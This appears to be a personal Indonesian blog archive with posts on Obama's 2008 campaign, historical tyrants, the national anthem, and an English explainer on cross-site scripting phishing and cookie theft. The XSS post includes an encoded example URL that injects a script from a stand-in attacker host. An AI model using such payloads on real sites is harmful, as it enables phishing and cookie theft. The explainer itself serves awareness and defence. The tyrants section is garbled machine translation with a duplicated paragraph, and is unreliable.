Rabu, 31 Maret 2010


Selamat datang ... terima kasih kita ... sudah lama saya tidak menulis lagi yah ... mungkin karna kesibukan saya jadi saya tidak dapat menyempatkan diri untuk melakukan tulisan tulisan lagi ... OK saya akan memulai tulisan saya lagi ... kali ini saya akan mencoba membahas mengapa motivasi karyawan menjadi turun .... tulisan saya ini saya ilustrasikan dengan format yang berbeda semoga anda dapat memahaminya

Kamis, 25 September 2008


Meski namanya baru dikenal publik Amerika Serikat (AS) sekitar 2 tahun lalu, namun kehadirannya sudah mampu menandingi pesaing lainnya dalam kancah kandidat presiden AS. Barack Obama dikenal sebagai seorang sosok politisi yang senang berkomunikasi baik langsung maupun tidak dengan warga AS. Beliau seringkali menuangkan isi pikiran, pendapat serta ide-ide barunya yang dikemas dalam sebuah audiofile podcasting yang selalu bisa diakses oleh publik di seluruh dunia. Suaranya yang bersahaja dan ramah mengesankan seolah-olah beliau sedang berbicara langsung secara personal kepada para pendengarnya. Hal ini tentunya patut dijadikan sebuah keuntungan yang belum tentu dimiliki oleh setiap politisi dimanapun.

Baru-baru ini, Obama juga menggelar sebuah orasi, sebuah kegiatan yang sering beliau lakukan dan berorasi memang suatu kehandalan yang dimilikinya. Orasinya kali ini dilakukan di sebuah taman di Nevada pada waktu siang hari. Walaupun teriknya matahari terasa sungguh menyengat siang itu, namun tidak ada satu orang pun yang malah sibuk mencari tempat teduh di taman tersebut. Semua pengunjung taman tampak terkesima dengan orasi yang disampaikan Obama siang itu. Tidak ada satupun kandidat presiden AS lainnya yang mampu mengumpulkan begitu banyak orang yang bersemangat ingin mendengarkan orasi seorang politisi. Beberapa pengunjung yakin bahwa ”dialah orang yang ditunggu-tunggu Amerika”. Salah seorang pengunjung taman yang kebetulan juga seorang penggemar Obama, Michelle, pernah menuliskan pesan di situs web-nya Obama. Pesannya adalah bahwa ia berharap akan ada peraturan yang menyulitkan orang-orang yang berpenyakit mental dalam memperoleh/membeli senapan. Tidak lama kemudian, Obama membuat usulan yang sama persis. Michelle beranggapan bahwa usulan yang dibuatnyalah yang menginspirasi Obama. Namun orang lain beranggapan bahwa usulan Obama semata hanya karena kasus penembak yang membunuh 32 orang di Virginia beberapa waktu lalu.

Siapakah Obama sebenarnya? Ia mengaku dirinya adalah anak dari ayahnya yang berdarah Kenya yang kesehariannya menggembala kambing. Suatu masa, ayahnya mendapat beasiswa untuk belajar di AS, dimana ia akhirnya menikah dengan seorang wanita berkulit putih dari Kansas. Walaupun orang tuanya tidak kaya, tapi mereka berhasil menyekolahkan anaknya di Harvard.

Sekarang ini, mungkin kulit hitamnya bisa membantu posisinya dalam pemilu presiden nanti. Beberapa generasi lalu, hal ini justru akan merugikan dan bahkan fatal bagi dirinya. Namun kini, masyarakat kulit putih AS justru menilai hal ini sebagai tanda optimistik dari fron rasial. Banyak diantara mereka akan memilih presiden berkulit hitam dan menunjukkan pada dunia, dan diri mereka sendiri, bahwa kulit hitam bukanlah pecundang. Beberapa juga berpendapat bahwa, ”Saatnya telah tiba. Sejauh ini hanya ada pria kulit putih dari kalangan kelas atas.”

Keadaan sekarang ini tentunya merupakan sebuah kesempatan dan keuntungan yang harus diraih oleh Obama. Meski beberapa masyarakat kulit hitam masih meragukan posisi Obama “di kalangan kulit hitam”, karena nenek moyangnya tidak dibawa ke AS sebagai budak dan beliau juga tidak memegang peran dalam gerakan memperjuangkan hak-hak sipil. Menanggapi ini, Obama berkata bahwa dirinya telah banyak berjuang melawan isu rasial. Dalam otobiografinya, beliau ingat akan masa kecilnya dimana seorang kulit hitam telah disiksa dengan menggunakan racun kimia untuk memutihkan kulitnya. Beliau juga pernah menonjok seseorang yang menghinanya dan mengejeknya. Namun sebagai seorang yang berpikiran secara dewasa, dirinya memilih untuk menempuh jalan konsiliasi dibanding konflik.

Meski demikian, mampukah karisma Obama memenangkan dirinya dalam nominasi presiden nantinya? Menurut jajak pendapat, mungkin tidak. Obama tetap belum bisa menyamakan kedudukan dengan organisasinya Hillary Clinton. Obama masih tertinggal sekitar 10 poin di jajak pendapat nasional. Namun, Obama berhasil menggalang dana lebih besar daripada Clinton pada kwartal pertama tahun ini. Jajak pendapat lainnya mengatakan bahwa Obama memiliki kesempatan yang lebih baik dibanding Clinton dalam mengalahkan kandidat papan atas dari Partai Republik, seperti Rudy Giuliani dan John McCain. Jelas, Obama tetap harus dianggap sebagai kandidat yang berpotensi.

Posisinya mengenai perang Irak sangat jelas. Sedikit berbeda dari lawan utamanya, sejak awal, Obama jelas mengatakan tidak setuju dengan perang Irak. Berbicara mengenai kebijakan luar negeri, dirinya bersikap ambisius dan idealistik. Secara gamblang beliau berkata bahwa posisi sebagai pemimpin bagi dunia bebas ini terbuka lebar dan dia ingin menempati posisi tersebut. Obama ingin bekerja dengan Rusia untuk mengamankan bahan-bahan nuklir, pada saat bersamaan mendorong demokrasi dan transparansi di sana. Beliau juga ingin memperkuat NATO, membangun aliansi baru di Asia, menghentikan genosida di Darfur, memperjuangkan perdamaian di Timur Tengah, dan membantu negara-negara miskin membangun ekonomi pasar yang berfungsi. Obama tidak berbicara banyak mengenai ekonomi. Ia hanya ingin mengalokasikan dana yang lebih besar untuk sekolah, subsidi kesehatan, dan kepentingan veteran.

Senin, 22 September 2008

XSS vulnerabilities. >>>> :)

Phishing schemes are about to get a whole lot easier. Targeted attacks are much more likely to work now than ever before. Cookies stored on your computer can be retrieved by bad guys half a world away. Even big search engine companies like Google and Yahoo are shaking in their boots. What happened? The bad guys have discovered Cross-Site Scripting (XSS) and the Internet has sudden become a lot more dangerous. (updated with screen shots)

Through the magic of Cross-Site Scripting (XSS) even professional security people will have a hard time recognizing a phishing message. XSS also allows for the theft of cookies, and thus personal information and possibly passwords, stored on your computer. XSS may also have a detrimental affect on public search engine results and the trust we put in search results. This and much more is covered in this article. We've tried to boil things down so the subject is easy to understand. At the same time several examples are given showing just how bad XSS can be. Hopefully by the end of this article you'll have a much better understanding of XSS and why its something deserving of your attention.

Originally I had a hard time getting my arms around the whole XSS issue. Though the problem has been around for at least 10 years I, like many security people, didn't pay real close attention until recently. At first I didn't exactly understand the problem. Even after I saw some examples I didn't immediately see where this could cause much harm. Most of the examples simply popped up an alert box. Big deal. But I knew there was more to it because some people I really trust (or at least think are smart) were very worried. According to new figures from Mitre, a U.S. government-funded research organization XSS is now the #1 application vulnerability being reported. It has surpassed buffer overflows, SQL injections, directory traversals, even Denial of Service vulnerabilities. XSS now accounts for 21.5% of all reported vulnerabilities, rising from just 2% in 2001. This trend is certain to continue as more people become aware of the problem and locate vulnerable applications.

So it was time to develop a better understanding of this problem.

Let me tell you, XSS is very dangerous. If you've heard otherwise don't believe it. Unless you think this is some obscure vulnerability that may not affect you let me assure you this vulnerability is very widespread. People I've spoke with have told me that it takes them about 5-10 minutes to find a new vulnerable site. There are groups out there simply trying to see how many they can find and who can find a vulnerability on the most important websites (so far FBI.GOV and NSA.GOV probably top that list!). They have found (and documented) several banks, law firms, charities, insurance companies, dozens of government agencies, etc., with XSS vulnerabilities. They even found a XSS vulnerability on Acunetix's public website. Acunetix makes a security appliance that is designed to find just such web server vulnerabilities (Acunetix fixed the problem quickly but this serves as an example that any web site can have a XSS vulnerability). Probably hundreds of sites have been found so far and the search is really just beginning.

Unlike most vulnerability testing XSS searching does not modify anything on the remote server and does no harm to the server or the server's data. But as not to encourage phishing attacks based off these finding we will not be posting the actual example links or the full vulnerability address. However, we are aware that there are several sites out there that are posting them. Normally the example links posted on these sites are harmless (and therefore should not get anyone in trouble) but that is no guarantee that you won't stumble across some that are harmful. If you don't know what you're doing don't go to these sites or click on untrusted links. We will, on the other hand, be posting the names of those organizations so that they are pressured to fix the problem. Remember this vulnerability doesn't hurt their server, it hurts everyone else. We suspect the people finding these vulnerabilities are not reporting them to the organization that runs the server. There is still a lot of fear out there that someone will try to charge them with hacking. There is a good chance the vulnerability finders would would prevail in court but nobody wants to go through that, let someone else establish the precedence. But that means the web server administrators might be the last to know that their server is vulnerable and possibly be used for phishing attacks. If you operate web server you should pay attention to the “XSS Hall of Shame” here at NIST.org and the various vulnerability discovery sites that prove a server is vulnerable by including example links. Your company or organization may even be sued if someone falls victim to a XSS enabled phishing attack through your web server. Remember it is your server that allowed this to happen and the URL at the top indicates it is your server hosting the credit card entry form. You are probably especially liable if the problem is public knowledge and you've done nothing about it.

Though the vulnerability is on the server the threat is to the general public, the visitors to that server. Normally servers get exploited and the bad guys either deface the site or use it to load them up with exploit code that can do you harm. Either way web admins have something to work with. In this case nothing bad ever happens to the web server, nothing gets modified on the server, server security hasn't even been breached. It was never actually hacked. Let me explain.

To simplify things we'll use a phishing attack as an example. When the bad guy wants your credit card information one of the most common attacks starts with an email message. They send you an email message with links to some server they control. Both the email message and rogue server are made to look very much like a bank or other financial institute. But usually there are signs that something is wrong. The links in the email message point to an IP address or some domain other than the banks, or your web browser shows the odd address after you click on the link. Instead of the normal 'http://www.normalbank.com' you see something like '' or 'http://normalbank.c8a45.ru'. Clear signs that something isn't right.

But with XSS the links look fine. Even the address in your browser looks fine. There is nothing apparently wrong. But the key word is 'apparently'. Because with XSS the good server is acting much like a money laundering operation, taking the bad address, cleaning it up so it looks legitimate, and sending it to your browser. All without any changes or exploits to the good server. The fault is with some bit of code that was designed to accept user input. Often times a search form on the good server is what is used in a XSS exploit (remember it is you that is being exploited, not the server). The programmers simply didn't take the time time to filter the user input of Javascript or HTML code and they allowed the original form input to be fed back to the person that entered it without modification. The form input doesn't have to be you entering the text in a block it can often be coded right in to a URL, obfuscated so you don't even know its there. Finding these vulnerabilities isn't even thought to be hacking. Again nothing is compromised on the server, it is doing exactly as it was designed to do. It was just designed poorly. Programmers search for code syntax on the Internet all the time, who would have thought that simply searching for it could cause it to activate back on their own computer. That's just dumb. But other input forms are vulnerable as well, not just search forms.

So here is how it works in a XSS attack. The bad guy sends you one of those well crafted email messages made to look like it came from your bank (again we'll use 'Normal Bank' with a domain of 'normalbank.com'). The email you receive comes from survey@normalbank.com and looks just like the one's your bank normally sends you, with privacy notices, copyrights, etc. It claims you will get $50 deposited to your account simply by taking an on-line survey. The links on the page all point to your bank's domain and look perfectly legitimate, something like:
http://www.normalbank.com/survey.php?q=%3C%73%63%72 %69%70%74%20%73%72%63 %3D%2F%2F%62%61%64%67%75%79% 73%69%6E%63%2E%6E%65%74%2F%62%61 %64%73%63%72%69%70 %74%2E%6A%73%3E

We've all seen gobbly gook as part of normal looking URL's and that in and of its self is not a clue that something is wrong. The larger the company the more likely the URL's will contain gobbly gook because it is often used to request documents or information from databases. So you click the link and you are brought to a page that looks exactly like one from www.normalbank.com prompting you to login to take the survey and claim your $50. The URL in your browser's address bar looks perfectly legitimate and matches the URL above. You login, take the survey, and you get a big thank you notice saying that the $50 will be deposited to your account in 3-5 days. YIPPIE!

So what's going on here? Well first of all you're not going to have $50 deposited to your account (dang it!). In fact the next time you check your account you'll probably find it contains a lot less money than it should. Embedded in the URL gobbly gook above is a bit of Javascript that is fed to a survey form entry page on www.normalbank.com. The form handler doesn't know what to do with this code so it simply reflects it back to your browser (as odd as that may seem). From your browser's point of view this Javascript apparently is coming from www.normalbank.com because it was just reflected from there. But this small bit of Javascript just loaded a complete page from the bad guys server and you just sent your banking information to their server. All without any indication that something was wrong.

The same method of Javascript reflection can be used by the bad guys to steal cookies stored on your computer. Cookies are small text files that a web server stores on your computer to save 'state' (where you're at or what you are doing) or information that your browser can use from visit to visit to save you time and effort. For example when you order something from a site they may store a cookie on your computer with your mailing addresses so the next time you order something you don't have to reenter that information. They may also store your credit card information that way. Normally only the site that dropped the cookie can retrieve it. But if the site has a XSS vulnerability the bad guy can send you a URL to retrieve that cookie. The URL first hits the legitimate site (again www.normalbankcom) but contains code to load Javascript from a server they control (www.badguys5486.ru). This Javascript contains code to retrieve the www.normalbank.com cookie from your computer and send it to them. Remember the URL looks like its coming from the good server so your browser dutifully retrieves the cookie as instructed.

So how do you avoid being exploited? Since you would have a very difficult time deciphering the URL (ok kids break out your secret decoder rings to see what you've won) all you can really do is never click on links sent to you via email. You've heard this before but most of you continue to ignore that advice. There are bad people all over the world that are much smarter at this than I am and they can send out millions of phishing spam messages. Occasionally there are bad people at good companies that will sell a company's client email list. You are vulnerable and XSS is far too easy to exploit.

The fix isn't an easy one. Unlike most vulnerabilities this isn't something that can be patched by Microsoft. The cause of the problem isn't the operating system or the web browser. Usually the problem is with custom programming code written by experienced and inexperienced programmers alike. All of these separate vulnerable programs will have to be fixed. In some cases a companies search engine appliance will have to be totally replaced if it is no longer supported by the manufacturer. So this problem won't go away quickly. But companies need to act because their servers are making us more vulnerable.

At the beginning of this article I mentioned that this vulnerability can have a negative affect on public search engine results. XSS has the potential to undermine how search engines rank pages, thus listing garbage sites above valuable one's. How? This is another thing that I didn't immediately understand. How can weirdly crafted URL's trick the likes of Google and Yahoo? Most public search engines rank sites higher if they have a lot of inbound links (links from other sites). Many also rank the quality of those inbound links so a link on a page at Time.com is worth a lot more than a link on some kids free MySpace page. With XSS it is possible to create links that appear to be on a vulnerable site's page. We've seen examples of this where text and links seem to be magically added to web pages. Javascript is widely used to create content on pages (this site uses it in some of the sidebar panels) so the search engines have to understand it. Search Engine Optimization (SEO) is big business, companies pay thousands of dollars to get their sites ranked higher. When you feed Google a XSS URL (like the example above) it thinks all the Javascript content from derived from that URL was meant to be delivered from that page. But with XSS you can use foreign XSS to apparently create links on a good server's site that aren't actually there (remember nothing has actually been changed on the server). So a quick way to boost SCO is to find as many XSS vulnerable sites and through the magic of Javascript create links to your site. Yahoo, MSN, Google, etc. will see all of those links from well respected sites and rank your site higher. Now before you run off and do this let me tell you that these public search engine companies are not stupid. They are very aware of this problem and are actively working on fixes. When they find you doing this you will be blacklisted (eg; you may never show up in search results again). They aren't discussing the situation but it is believed that they can currently detect some XSS URL's but not others. If you search for 'XSS SEO' you'll find lots of discussion on blackhat SEO sites, hacker sites, and a few whitehat security sites. But lets hope the search engines get a handle on this soon or they'll be one more thing on the Internet that we've lost faith in.

Targeted attack scenarios:

* You get an email message that appears to be from your stock broker suggesting that you buy stock in Acme War Materials immediately. They claim to have inside information that this company is about to win a huge military contract and the stock will double overnight. There is a link in the email to your brokers site for more information. The page even includes a very nice looking PDF file from an Army contracting office that is awarding the contract to them. The informed and suspicious among us would know they wouldn't be allowed to do this. But a certain percentage of people would jump at the chance to double their money. The bad guy will probably win two ways here. The first way is that they'll include a login on their bogus page and will capture your brokerage account info. The second way they'll make money is they'll take out options on that stock ahead of time to sell at a set price. When this stock goes up in value they make money. Our spam honeypot already captures dozens of spam messages per day promoting junk stocks.
* You get an email message from a U.S. Government agency that works in disaster relief. The message says that though they are currently helping hundreds of displaced children the money allocated by Congress is not nearly enough. The eMail message points to a web page on the goodserver.gov website with pictures of hungry children and a form for you to donate money with your credit card. All addresses and links appear to be from the goodserver.gov website. Again, a lot of people would know that the government wouldn't solicit donations this way. But many people would fall for it. What if the email and web address came from a legitimate save-the-starvingkids.org web address would that make people less suspicious? Timed to occur soon after a disaster the response rate to such an email would be very high. We've had reports of several such vulnerable government sites and charity sites that could be used this way.
* You get an email from your state's tax office with your full name and street address in the message saying that you have been audited. The link on the page takes you to http://www.state.yy.us (the 'yy' being your states abbreviation and is legitimate). It asks you to login with your name (with the block already filled in for you. How convenient), and the password is your social security number. The page that comes up says that you owe the state a grand total of $23.46 and offers you a chance to avoid a face to face audit by paying up now. You can either mail a check to their legitimate street address or use the oh so convenient credit card form on the page. For less than $25 most people would be glad to avoid a face to face audit and most people would take advantage of the credit card payment method. Now they own your social security number and your credit card number. Your name, address and email address they got from a bad employee at a store you do business with. This is called a targeted attack and is very effective. Yes, we know of several state web sites with XSS vulnerabilities.


Stalin adalah Sekretaris Umum Partai Komunis dari Komite Sentral Uni Soviet dari tahun 1922 sampai kematiannya di tahun 1953. DI bawah kepemimpinan Stalin, Negara bagian Ukraina menderita kelaparan sangat hebat (Holodomor), oleh kebanyakan orang hal ini dianggap akibat dari pemusnahan massal yang merupakan bagian dari kebijakan pemerintahan Stalin. Perkiraan jumlah kematian bervariasi dari 2,5 juta sampai 10 juta. Kelaparan disebabkan oleh politik dan administratif keputusan. Disamping kelaparan, Stalin memerintahkan pembersihan dalam Uni Soviet orang mana pun yang dianggap sebagai musuh negara bagian. Di total, perkiraan jumlah yang dibunuh di bawah pemerintahan Stalin berkisar antara 10 juta hingga 60 juta orang.

Adolf Hitler ditetapkan Kanselir Jerman pada
1933, menjadi "Fuhrer" pada 1934 sampai bunuh dirinya pada 1945. Di akhir Perang Dunia 2, Kebijakan teritorial penaklukan dan pemusnahan rasianya sudah membawa kematian dan penyiksaan jutaan orang, termasuk pembantaian sebanyak kira-kira enam juta orang Yahudi yang sekarang dikenal sebagai Holocaust. Pada 30 April 1945, sesudah pertempuran hebat street-to-street , ketika tentara Uni Soviet terlihat dalam blok atau dua Reich Chancellory, Hitler bunuh diri, menembak dirinya sendiri sambil menggigit sebiji kapsul sianida.

Ivan IV Rusia, juga dikenal sebagai Ivan yang Mengerikan, adalah Adipati Megah Muscovy dari 1533 sampai 1547 dan adalah penguasa pertama Rusia yang mengambil hak Kaisar. Di tahun 1570, Ivan di bawah kepercayaan yang direncanakan oleh elite kota Novgorod untuk menyebrang ke Polandia, dan menyuruh seorang tentara menghentikan mereka pada 2 Januari. Tentara Ivan membangun tembok sekitar garis keliling kota untuk mencegah orang kota yang terlepas. Antara 500 sampai 1000 orang dikumpulkan setiap hari oleh tentara, lalu disiksa dan dibunuh di muka Ivan dan anak lelakinya. Di 1581, Ivan memukulnya penuh anak perempuan-di-undang-undang karena memakai pakaian yang tak sopan, menyebabkan keguguran.Anak lelakinya, yang juga bernama Ivan, beradu argumen dengan ayahnya.Yang menyebabkan Ivan yang memukul anak lelakinya di kepala dengan tongkat runcingnya, lalu anaknya tewas seketika.

Vlad III Rumania (juga dikenal sebagai Vlad Impaler) ialah Pangeran Wallachia tiga kali dari tahun 1448 sampai tahun 1476. Vlad lebih dikenal sebagai legenda penghukum yang sangat kejam. Dia memaksa selama pemerintahannya, dan dia juga dijadikan sebagai ilham pokok bagi karakter utama vampir"Bram Stoker" di populer Dracula baru. Di Rumania dia dianggap sebagai seorang pangeran dengan perasaan mendalam tentang keadilan. Daftar penyiksaan dia dinyatakan untuk sudah mempekerjakan ekstensif: kuku di kepala, memotong dahan, membutakan, pencekikan, dibakar, memotong hidung dan telinga, pemotongan organ seksual (khususnya di kasus wanita), menguliti kepala, menguliti, pembeberan sampai elemen atau ke binatang, dan mendidihkan oranghidup-hidup. Ada klaim bahwa atas beberapa kesempatan sepuluh ribu orang ditusuk di tahun 1460. Vlad III Rumania (juga dikenal sebagai Vlad Impaler) ialah Pangeran Wallachia tiga kali dari tahun 1448 sampai tahun 1476. Vlad lebih dikenal sebagai legenda penghukum yang sangat kejam. Dia memaksa selama pemerintahannya, dan dia juga dijadikan sebagai ilham pokok bagi karakter utama vampir"Bram Stoker" di populer Dracula baru. Di Rumania dia dianggap sebagai seorang pangeran dengan perasaan mendalam tentang keadilan. Daftar penyiksaan dia dinyatakan untuk sudah mempekerjakan ekstensif: kuku di kepala, memotong dahan, membutakan, pencekikan, dibakar, memotong hidung dan telinga, pemotongan organ seksual (khususnya di kasus wanita), menguliti kepala, menguliti, pembeberan sampai elemen atau ke binatang, dan mendidihkan oranghidup-hidup. Ada klaim bahwa atas beberapa kesempatan sepuluh ribu orang ditusuk di tahun 1460.

Pol Pot adalah pemimpin Khmer Rouge dan Perdana Menteri Kamboja dari 1976 sampai 1979, sudah de fakto pemimpin sejak pertengahan 1975. Selama masa kekuasaannya, Pol Pot memaksakan versi ekstrim komunisme agraris di mana semua penduduk kota dipindahkan ke daerah pedalaman untuk bekerja di perkebunan kolektif dan proyek kerja paksa. Efek gabungan kerja budak, kekurangan gizi, perewatan kedokteran yang buruk dan pelaksanaan ditaksir untuk sudah membunuh sekitar 2 juta orang Kamboja (sekitar sepertiga penduduk). Rezimnya mencapai reputasi buruk istimewa karena memilih semua cendekiawan dan "kaum borjuis musuh" lain untuk pembunuhan. Khmer Rouge melakukan eksekusi masal di tempat yang dikenal sebagai "Ladang Pembunuhan". Yang dieksekusi dikubur di kuburan masal. Untuk menghemat amunisi, eksekusi sering dillakukan memakai palu, tangkai kampak, sekop atau tongkat bambu yang दिअसः।

Leopold II ialah Raja Belgia dari 1865-1909. Dengan bantuan keuangan dari pemerintah, Leopold membuat "Congo Free State", proyek pribadi yang dilakukan untuk menyadap karet dan gading di daerah Kongo Afrika tengah, yang mengandalkan kerja paksa dan menyebabkan kematian sebanyak sekitar 3 juta orang Kongo. Rezim Negara Bagian Bebas Kongo menjadi salah satu skandal internasional peralihan abad yang lebih terkenal keburukannya. Bidang tanah secara pribadi dimiliki oleh Raja adalah 76 kali lebih besar daripada Belgia, yang dia bebas menguasainya sebagai lingkup pribadi lewat tentara pribadinya, Force Publique. Pekerja perkebunan karet milik Leopold disiksa, memuntungkan dan membunuh secara kejam sampai di akhir abad, atas hati nuran,i Dunia Barat lalu memaksa Brusel untuk mengadakan perhentian.

Idi Amin adalah seorang perwira tentara dan presiden Uganda.
Dia mengambil tenaga di kup militer pada Januari 1971, menurunkan Milton Obote.
Kekuasaannya ditandai oleh pelanggaran hak asasi, penindasan politik, penganiayaan etnik, pembunuhan pengadilan ekstra dan pengusiran orang India dari Uganda. Jumlah orang yang dibunuh akibat rezimnya tak dikenal; perkiraan bervariasi dari 80.000 sampai 500.000.
Pada 4 Agustus, 1972, Amin mengeluarkan dekrit yang memerintahkan pengusiran ke60.000 orang Asia yang tidak adalah warganegara Uganda (kebanyakan dari mereka memuat paspor Inggris). Ini nanti diperbaiki untuk memasukkan ke80.000 orang Asia, dengan kekecualian profesional, seperti dokter, pengacara dan guru.
Amin akhirnya digulingkan, tetapi sampai kematiannya, dia memegang bahwa Uganda perlu dia dan dia tidak pernah mengungkapkan penyesalan yang dalam untuk penyalahgunaan rezimnya।

Jumat, 19 September 2008


Seberapa tenarkan lagu kebangsaan kita "INDONESIA RAYA" dikalangan rakyat indonesia ???? apa malah jangan jangan banyak rakyat indonesia yang tidak hapal dan tidak mengerti tentang makna dan naskah dari algu kebangsaan kita itu ... atau lebih parah lagi rakyat indonesia malu menyanyikan lagu tersebut ???? ........ kejadian ini saya alami secara langsung tadi sore ketika JJS sore pada jam 5 sore lah kurang lebih di perempatan jalan raya kebeneran lagi kena lampu merah ada banyak sekali pengamen yang lagi ngamen .... nah ada 2 orang pengamen laki-laki yang masih kecil kurang lebih 12-15 thnan lah umurnya mendekati kendaraan yang sedang saya kendarai... dia mengetok kaca dan permisi untuk mengamen lalu saya hanya senyum aja toh gak ada ruginya ... dia ngamen ... dia nyanyikan SATU lagu YANG POP judulnya TELAH HABIS TERANG .. klo gak salah yg nyanyi peterpan .... kebetulan lampu merah masih lama lalu saya mengatakan pada pengamen tersebut ... " request lagu boleh ??? dia jawab Boleh mas ... saya minta lagu " INDONESIA RAYA " si pengamen kaget dan merah mukanya dia bilang lagunya gak keren mas trus lagunya gak bagus juga and saya gak hapal juga " astaga kaget saya dibilang gitu MOSOK rakyat indonesia gak hapal lagu kebangsaannya ???? sesuatu yang sangat MIRIS UNTUK KEMAJUAN BANGSA DAN NEGARA ??? mungkin bagi temen temen yang baca blog saya ... cobain deh apa yang akan terjadi jika anda minta temen atawa sodara atawa pengamen untuk menyanyikan lagu INDONESIA RAYA ................. ????? OH TUHAN WAJAR BANGSAKU SEKARANG MENJADI BANGSA YANG TIDAK MAJUUUUUUUUUUUUUUUUU.......... NASIBMU BANGSAKU TIDAK LAGI MEMILIKI NEGARAWAN YANG CINTA MATI PADA DIRIMUUUUUUUUUUUUUUUUUUU...........

By :Mr_Waled .......... waledenator is me